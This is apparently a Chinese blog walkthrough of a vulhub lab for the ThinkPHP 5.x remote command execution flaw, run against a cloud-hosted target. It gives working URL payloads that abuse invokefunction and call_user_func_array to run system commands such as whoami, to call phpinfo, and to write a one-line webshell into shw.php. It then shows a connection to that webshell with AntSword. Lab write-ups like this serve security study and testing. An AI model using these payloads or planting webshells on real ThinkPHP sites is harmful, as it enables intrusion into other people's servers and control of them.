Thinkphp5x远程命令执行 靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/04a49df66abb463c9c0543bf4c310e36.png) ### 3.远程代码执行 POC: ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/a6eeab97a027466d910a1e84e0b1d2a9.png) ### 4.写入一句话木马到根目录下的shw.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> shw.php ### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/d247f62ffdf7449bafe4d66c51704031.png)

相关推荐
catchadmin18 分钟前
2026 年 PHP 开发者进阶 快速高效开发学习习惯
学习·php
Web极客码1 小时前
深入解析WordPress的functions.php文件及其高效使用方法
开发语言·php
catchadmin2 小时前
CatchAdmin 2025 年终总结 模块化架构的进化之路
架构·php·开源软件
微爱帮监所写信寄信2 小时前
微爱帮监狱寄信写信小程序PHP底层优化框架
java·开发语言·数据库·spring·微信·php·mybatis
小虎哥-技术博客11 小时前
ThinkPHP 5.x 到 8.x 行为扩展迁移指南
php
小虎哥-技术博客15 小时前
ThinkPHP 5 到 ThinkPHP 8 路由迁移完整指南
php
yangSnowy18 小时前
PHP的运行模式
开发语言·php
YJlio21 小时前
网络与通信具总览(14.0):从 PsPing 到 TCPView / Whois 的联合作战
开发语言·网络·php
iCheney!21 小时前
php生成赛博像素风头像
开发语言·php
小虎哥-技术博客1 天前
ThinkPHP 5.0.24 到 ThinkPHP 8.x 迁移学习指南
php
热门推荐
01GitHub 镜像站点02jdk21下载、安装(Windows、Linux、macOS)03Linux下V2Ray安装配置指南04Claude Code Skills 实用使用手册05UV安装并设置国内源06手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!072025 最新教程:注册并切换到美区 Apple ID08从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击09【踩坑笔记】50系显卡适配的 PyTorch 安装10祝大家 2026 年新年快乐,代码无 bug,需求一次过